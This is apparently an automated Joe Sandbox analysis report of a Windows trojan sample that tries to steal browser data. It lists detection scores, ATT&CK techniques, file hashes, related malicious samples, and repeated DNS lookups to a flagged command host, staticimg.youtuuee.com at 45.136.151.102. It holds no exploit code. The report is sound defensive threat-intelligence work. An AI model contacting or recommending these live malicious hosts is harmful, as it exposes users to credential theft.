Windows Analysis Report 7PPXbfDkRN

ID: 508206  Sample Name: 7PPXbfDkRN  Cookbook: default.jbs  Time: 09:45:12  Date: 24/10/2021  Version: 33.0.0 White Diamond



Table of Contents

Windows Analysis Report 7PPXbfDkRN
  Overview
    General Information
    Detection
    Signatures
    Classification
  Process Tree
  Malware Configuration
  Yara Overview
  Sigma Overview
  Jbx Signature Overview
    AV Detection
    Networking
    Stealing of Sensitive Information
  Mitre Att&ck Matrix
  Behavior Graph
  Screenshots
    Thumbnails
  Antivirus, Machine Learning and Genetic Malware Detection
    Initial Sample
    Dropped Files
    Unpacked PE Files
    Domains
    URLs
  Domains and IPs
    Contacted Domains
    Contacted URLs
    URLs from Memory and Binaries
    Contacted IPs
      Public
      Private
  General Information
  Simulations
    Behavior and APIs
  Joe Sandbox View / Context
    IPs
    Domains
    ASN
    JA3 Fingerprints
    Dropped Files
  Created / dropped Files
  Static File Info
    General
    File Icon
  Static PE Info
    General
    Entrypoint Preview
    Data Directories
    Sections
    Resources
    Imports
    Possible Origin
  Network Behavior
    Network Port Distribution
    TCP Packets
    UDP Packets
    DNS Queries
    DNS Answers
    HTTP Request Dependency Graph
    HTTP Packets
  Code Manipulations
  Statistics
  System Behavior
    Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124
      General
      File Activities
        File Read
      Registry Activities
        Key Created
        Key Value Created
  Disassembly
    Code Analysis

Copyright Joe Security LLC 2021 Page 2 of 58


Windows Analysis Report 7PPXbfDkRN

Overview

General Information

Sample Name:

7PPXbfDkRN (renamed file extension from none to exe)

Analysis ID: 508206

MD5: 1614d9adfb1903a…

SHA1: cfa0028bb78e1b0…

SHA256: 42de2be8dd54f07…

Tags: exe trojan


Most interesting Screenshot:

Detection

Score: 64

Range: 0 - 100

Whitelisted: false

Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Tries to harvest and steal browser information (history, passwords, etc)
May check the online IP address of the machine
Uses a known web browser user age…
May sleep (evasive loops) to hinder…
PE file contains sections with non-s…
Internet Provider seen in connection…
Sample execution stops while proce…
IP address seen in connection with o…
Contains long sleeps (>= 3 min)

Classification

[Classification chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean / suspicious / malicious]

Process Tree

System is w10x64

7PPXbfDkRN.exe (PID: 5172 cmdline: 'C:\Users\user\Desktop\7PPXbfDkRN.exe' MD5: 1614D9ADFB1903A189E6EFD9B6DC4077)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for domain / URL

Networking:

May check the online IP address of the machine

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Mitre Att&ck Matrix

Numbers after a technique are the counts shown in the report's matrix for that technique.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts

Execution: Command and Scripting Interpreter 2; Scheduled Task/Job; At (Linux); At (Windows); Cron

Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script

Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script

Defense Evasion: Virtualization/Sandbox Evasion 2 1; Rootkit; Obfuscated Files or Information; Binary Padding; Software Packing

Credential Access: OS Credential Dumping 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets

Discovery: Security Software Discovery 1; Virtualization/Sandbox Evasion 2 1; System Information Discovery 1; Remote System Discovery 1; System Network Configuration Discovery 1

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH

Collection: Data from Local System 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits

Command and Control: Non-Application Layer Protocol 3; Application Layer Protocol 1 3; Ingress Tool Transfer 1; Protocol Impersonation; Fallback Channels

Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication

Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups

Behavior Graph


[Behavior graph: ID 508206, Sample 7PPXbfDkRN, Startdate 24/10/2021, Architecture WINDOWS, Score 64]

Signatures shown in the graph: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; May check the online IP address of the machine; Tries to harvest and steal browser information (history, passwords, etc)

Process: 7PPXbfDkRN.exe (started)

Network nodes:

staticimg.youtuuee.com, 45.136.151.102, ports 49740, 49747, 49751, ENZUINC-US, Latvia

ip-api.com, 208.95.112.1, ports 49735, 80, TUT-ASUS, United States

192.168.2.1, unknown, unknown

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
7PPXbfDkRN.exe | 36% | Virustotal | | Browse
7PPXbfDkRN.exe | 37% | Metadefender | | Browse
7PPXbfDkRN.exe | 79% | ReversingLabs | Win64.Trojan.Fabookie |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
staticimg.youtuuee.com | 10% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
staticimg.youtuuee.com | 45.136.151.102 | true | true | 10%, Virustotal, Browse | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation

URLs from Memory and Binaries

Name | Malicious | Antivirus Detection | Reputation

Contacted IPs

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | false
45.136.151.102 | staticimg.youtuuee.com | Latvia | | 18978 | ENZUINC-US | true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond

Analysis ID: 508206

Start date: 24.10.2021

Start time: 09:45:12

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 5m 56s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: 7PPXbfDkRN (renamed file extension from none to exe)

Cookbook file name: default.jbs

Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211

Number of analysed new started processes analysed: 23

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled

Analysis Mode: default

Analysis stop reason: Timeout

Detection: MAL

Classification: mal64.troj.spyw.winEXE@1/0@146/3

EGA Information: Failed

HDC Information: Failed

HCA Information: Failed

Cookbook Comments: Adjust boot time; Enable AMSI

Warnings:

Simulations

Behavior and APIs

Time | Type | Description
09:46:11 | API Interceptor | 403x Sleep call for process: 7PPXbfDkRN.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context


Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Copyright Joe Security LLC 2021 Page 11 of 58

Page 12: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

g9d9sc3dDi.exe Get hash malicious Browse 45.136.151.102

g9d9sc3dDi.exe Get hash malicious Browse 45.136.151.102

92aAMtF9lF.exe Get hash malicious Browse 45.136.151.102

AeXXqhQNJKur7teIlOrvF329.exe Get hash malicious Browse 45.136.151.102

48fl6271oClv7lfnOsBHvbLy.exe Get hash malicious Browse 45.136.151.102

UZlg2Sq2pQ.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

TNIZtb3HS3.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

BC2CCE5055F9411C04EDEEE699D7161C257574B4C5540.exe Get hash malicious Browse 45.136.151.102

F0627549D39AD1D85BCAAE5CF0B5A90B885658E348480.exe Get hash malicious Browse 45.136.151.102

D44D77232A9E6E684F1ECE4C9C05B3DCB63D4296CFD29.exe Get hash malicious Browse 45.136.151.102

2D100CC76F229AC10A7589E1AEA0BFB47B5692840D8F2.exe Get hash malicious Browse 45.136.151.102

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context

ENZUINC-US setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

Fri051e1e7444.exe Get hash malicious Browse 45.136.151.102

SEnSqwqeRl Get hash malicious Browse 23.88.113.7

Q2dNzrdHL5 Get hash malicious Browse 23.88.113.7

vCLbAS7aPb Get hash malicious Browse 23.88.113.7

cZw3sVi3XA Get hash malicious Browse 23.88.113.7

UP7YvQ7MD5 Get hash malicious Browse 23.88.113.7

TXdFsHmNmT Get hash malicious Browse 23.88.113.7

7xe3YujfLB Get hash malicious Browse 23.88.113.7

GzLV5uJyv0 Get hash malicious Browse 23.88.113.7

IVkF8LNn8r Get hash malicious Browse 23.88.113.7

M1UhoPMTwf Get hash malicious Browse 23.88.113.7

wA5D1yZuTf.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

arm7 Get hash malicious Browse 23.245.1.206

nKnpb3gEQR.exe Get hash malicious Browse 45.136.151.102

nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102

nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102

NOEvrN6EpT.exe Get hash malicious Browse 45.136.151.102

TUT-ASUS C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe Get hash malicious Browse 208.95.112.1

setup_x86_x64_install.exe Get hash malicious Browse 208.95.112.1

13294_Video_Oynat#U0131c#U0131.apk Get hash malicious Browse 208.95.112.1

Fri051e1e7444.exe Get hash malicious Browse 208.95.112.1

Comprobante de pago.xls Get hash malicious Browse 208.95.112.1

Comprobante de pago.doc Get hash malicious Browse 208.95.112.1

wA5D1yZuTf.exe Get hash malicious Browse 208.95.112.1

Pv9HB349oG.exe Get hash malicious Browse 208.95.112.1

setup_x86_x64_install.exe Get hash malicious Browse 208.95.112.1

PozfYoUNtW.exe Get hash malicious Browse 208.95.112.1

DiscordSniper.exe Get hash malicious Browse 208.95.112.1

Nightmare Booter (DDos) [IP Stresser] (1).exe Get hash malicious Browse 208.95.112.1

HazardNuker.exe Get hash malicious Browse 208.95.112.1

2wY8F2BCNp.exe Get hash malicious Browse 208.95.112.1

7WVpng6phO.exe Get hash malicious Browse 208.95.112.1

Comprobante de pago (OCT).xls Get hash malicious Browse 208.95.112.1

tywt33OZI0.exe Get hash malicious Browse 208.95.112.1

setup_x86_x64_install.exe Get hash malicious Browse 208.95.112.1

7mqSo6rtA0.exe Get hash malicious Browse 208.95.112.1

nIXnNtZvtI.exe Get hash malicious Browse 208.95.112.1

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32+ executable (GUI) x86-64, for MS Windows

Entropy (8bit): 6.464543276535742

TrID: Win64 Executable GUI (202006/5) 92.65%; Win64 Executable (generic) (12005/4) 5.51%; Generic Win/DOS Executable (2004/3) 0.92%; DOS Executable Generic (2002/1) 0.92%; Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%

File name: 7PPXbfDkRN.exe

File size: 1413632

MD5: 1614d9adfb1903a189e6efd9b6dc4077

SHA1: cfa0028bb78e1b0f51d4d389947319dd7beb10d5

SHA256: 42de2be8dd54f0733138e13af44653c7acf129ab0acc376d89a18b2b8a69101e

SHA512: d3000fa418a539e5f67bed3cfe4b754796eb18ee71e3e11635f0f9dc23fe4a0d25c173524c4e820958c0f3c5103f1db242737a5a8543c247fc2fa1913b251a2b

SSDEEP: 24576:P/mj8gr6siw8y8KbE0N4TMAeulQI1N6y83bMJb2dtGulJe:POjH7iby84E0aTrlQcNkbYidv

File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....h...h...h...l...h...k...h...m...h...m.".h...k...h.W.l...h.W.k...h.W.m._.h...i...h...i...h...a...h.......h...j...h.Rich..h

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x1400b2e74

Entrypoint Section: .text

Digitally signed: false

Imagebase: 0x140000000

Subsystem: windows gui

Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, HIGH_ENTROPY_VA

Time Stamp: 0x616F6E55 [Wed Oct 20 01:18:13 2021 UTC]

TLS Callbacks:

CLR (.Net) Version:

OS Version Major: 6

OS Version Minor: 0

File Version Major: 6

File Version Minor: 0

Subsystem Version Major: 6

Subsystem Version Minor: 0

Import Hash: a760781485268ad462242975d68411d5

Entrypoint Preview

Data Directories

Sections

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics

.text 0x1000 0x104e40 0x105000 False 0.528789885656 data 6.4831074188 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

.rdata 0x106000 0x39d10 0x39e00 False 0.387811318844 data 5.30917318484 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.data 0x140000 0xee44 0xba00 False 0.255565356183 DOS executable (block device driver) 4.63509517254 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

.pdata 0x14f000 0xbc10 0xbe00 False 0.473725328947 data 6.06247808176 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

_RDATA 0x15b000 0xf4 0x200 False 0.322265625 data 2.47542112189 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.rsrc 0x15c000 0x238 0x400 False 0.3310546875 data 4.8804957568 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.reloc 0x15d000 0x20ec 0x2200 False 0.291590073529 data 5.40005907283 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Imports

Possible Origin

Language of compilation system Country where language is spoken Map

English United States

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Oct 24, 2021 09:46:11.946676970 CEST 192.168.2.5 8.8.8.8 0x9eb8 Standard query (0) ip-api.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:12.464066982 CEST 192.168.2.5 8.8.8.8 0x70c5 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:13.722318888 CEST 192.168.2.5 8.8.8.8 0xe681 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:14.897198915 CEST 192.168.2.5 8.8.8.8 0x31f3 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:15.928636074 CEST 192.168.2.5 8.8.8.8 0xe589 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:17.180746078 CEST 192.168.2.5 8.8.8.8 0x9dac Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:18.349411964 CEST 192.168.2.5 8.8.8.8 0x8498 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:19.844815969 CEST 192.168.2.5 8.8.8.8 0x84fe Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:21.277093887 CEST 192.168.2.5 8.8.8.8 0x8a28 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:22.573318958 CEST 192.168.2.5 8.8.8.8 0xe2c7 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:23.903523922 CEST 192.168.2.5 8.8.8.8 0x64d7 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:25.446630001 CEST 192.168.2.5 8.8.8.8 0xdace Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:26.965976954 CEST 192.168.2.5 8.8.8.8 0x6af1 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:28.604495049 CEST 192.168.2.5 8.8.8.8 0x5c0b Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:30.065850973 CEST 192.168.2.5 8.8.8.8 0xed9f Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:31.754086971 CEST 192.168.2.5 8.8.8.8 0xa4a9 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:33.409524918 CEST 192.168.2.5 8.8.8.8 0xe6d1 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:34.893749952 CEST 192.168.2.5 8.8.8.8 0xccc3 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:36.386101961 CEST 192.168.2.5 8.8.8.8 0xde90 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:37.836447954 CEST 192.168.2.5 8.8.8.8 0x3d9 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:39.118809938 CEST 192.168.2.5 8.8.8.8 0x2d99 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:40.715872049 CEST 192.168.2.5 8.8.8.8 0x4bb7 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:41.984565020 CEST 192.168.2.5 8.8.8.8 0x1393 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:43.132354975 CEST 192.168.2.5 8.8.8.8 0x493e Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:43.751763105 CEST 192.168.2.5 8.8.8.8 0x37a8 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:44.392185926 CEST 192.168.2.5 8.8.8.8 0x449d Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:45.017168045 CEST 192.168.2.5 8.8.8.8 0xc73e Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:45.657663107 CEST 192.168.2.5 8.8.8.8 0x9934 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:46.295425892 CEST 192.168.2.5 8.8.8.8 0xb8ed Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:46.924460888 CEST 192.168.2.5 8.8.8.8 0x34f7 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:47.573483944 CEST 192.168.2.5 8.8.8.8 0x367c Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:48.228705883 CEST 192.168.2.5 8.8.8.8 0x81a9 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:48.849603891 CEST 192.168.2.5 8.8.8.8 0xbe8f Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:49.485466957 CEST 192.168.2.5 8.8.8.8 0x8469 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:50.119240999 CEST 192.168.2.5 8.8.8.8 0x23af Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:50.750996113 CEST 192.168.2.5 8.8.8.8 0x35c Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:51.378859997 CEST 192.168.2.5 8.8.8.8 0x82eb Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:51.999598980 CEST 192.168.2.5 8.8.8.8 0xabd4 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:52.629050016 CEST 192.168.2.5 8.8.8.8 0x7d96 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:53.256057024 CEST 192.168.2.5 8.8.8.8 0xa1d4 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:53.888422012 CEST 192.168.2.5 8.8.8.8 0x82e6 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:54.512336016 CEST 192.168.2.5 8.8.8.8 0x4eba Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:55.152755022 CEST 192.168.2.5 8.8.8.8 0x29fb Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:55.778196096 CEST 192.168.2.5 8.8.8.8 0xb16d Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:56.420088053 CEST 192.168.2.5 8.8.8.8 0x187d Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:57.084909916 CEST 192.168.2.5 8.8.8.8 0x74ac Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:57.711780071 CEST 192.168.2.5 8.8.8.8 0xbf1d Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:58.345809937 CEST 192.168.2.5 8.8.8.8 0x9bba Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:58.963766098 CEST 192.168.2.5 8.8.8.8 0x42ad Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:59.588766098 CEST 192.168.2.5 8.8.8.8 0x800d Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:00.236520052 CEST 192.168.2.5 8.8.8.8 0x654a Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:00.854355097 CEST 192.168.2.5 8.8.8.8 0x1137 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:01.488159895 CEST 192.168.2.5 8.8.8.8 0x1ba Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:02.108387947 CEST 192.168.2.5 8.8.8.8 0x9dae Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:02.715982914 CEST 192.168.2.5 8.8.8.8 0xd880 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:03.357161045 CEST 192.168.2.5 8.8.8.8 0xc520 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:03.991808891 CEST 192.168.2.5 8.8.8.8 0x6619 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:04.612890959 CEST 192.168.2.5 8.8.8.8 0xa0c7 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:05.234589100 CEST 192.168.2.5 8.8.8.8 0xded4 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:05.879797935 CEST 192.168.2.5 8.8.8.8 0xc7b8 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:06.523844004 CEST 192.168.2.5 8.8.8.8 0xe70a Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:07.132085085 CEST 192.168.2.5 8.8.8.8 0xa97e Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:07.765436888 CEST 192.168.2.5 8.8.8.8 0xe8de Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:08.387015104 CEST 192.168.2.5 8.8.8.8 0x8d83 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:09.002317905 CEST 192.168.2.5 8.8.8.8 0x30ae Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:09.626015902 CEST 192.168.2.5 8.8.8.8 0x4a01 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:10.249627113 CEST 192.168.2.5 8.8.8.8 0x6280 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:10.964214087 CEST 192.168.2.5 8.8.8.8 0xdb87 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:11.956691980 CEST 192.168.2.5 8.8.8.8 0x197e Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:13.232443094 CEST 192.168.2.5 8.8.8.8 0x31c7 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:13.898673058 CEST 192.168.2.5 8.8.8.8 0x22e5 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:14.507369995 CEST 192.168.2.5 8.8.8.8 0x9cba Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:15.110958099 CEST 192.168.2.5 8.8.8.8 0xac31 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:15.722754955 CEST 192.168.2.5 8.8.8.8 0xc91 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:16.362447023 CEST 192.168.2.5 8.8.8.8 0xbb6 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:16.981462002 CEST 192.168.2.5 8.8.8.8 0xd77c Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:17.597531080 CEST 192.168.2.5 8.8.8.8 0x6291 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:18.550430059 CEST 192.168.2.5 8.8.8.8 0x852f Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:19.168601036 CEST 192.168.2.5 8.8.8.8 0x57a2 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:19.781433105 CEST 192.168.2.5 8.8.8.8 0xc556 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:20.381217003 CEST 192.168.2.5 8.8.8.8 0x46f3 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:20.995613098 CEST 192.168.2.5 8.8.8.8 0xf185 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:21.603290081 CEST 192.168.2.5 8.8.8.8 0x1604 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:22.232975960 CEST 192.168.2.5 8.8.8.8 0x94b Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:22.881362915 CEST 192.168.2.5 8.8.8.8 0x47d3 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:23.503819942 CEST 192.168.2.5 8.8.8.8 0xf03d Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:24.114782095 CEST 192.168.2.5 8.8.8.8 0xc178 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:24.762109041 CEST 192.168.2.5 8.8.8.8 0x3452 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:25.395534992 CEST 192.168.2.5 8.8.8.8 0xcb54 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:26.010318041 CEST 192.168.2.5 8.8.8.8 0xcbc1 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:26.613825083 CEST 192.168.2.5 8.8.8.8 0xcd1c Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:27.235318899 CEST 192.168.2.5 8.8.8.8 0xbda2 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:27.846848011 CEST 192.168.2.5 8.8.8.8 0xc3e3 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:28.439615011 CEST 192.168.2.5 8.8.8.8 0xd6db Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

Oct 24, 2021 09:47:29.127942085 CEST 192.168.2.5 8.8.8.8 0x54b1 Standard query (0) staticimg.youtuuee.com A (IP address) IN (0x0001)

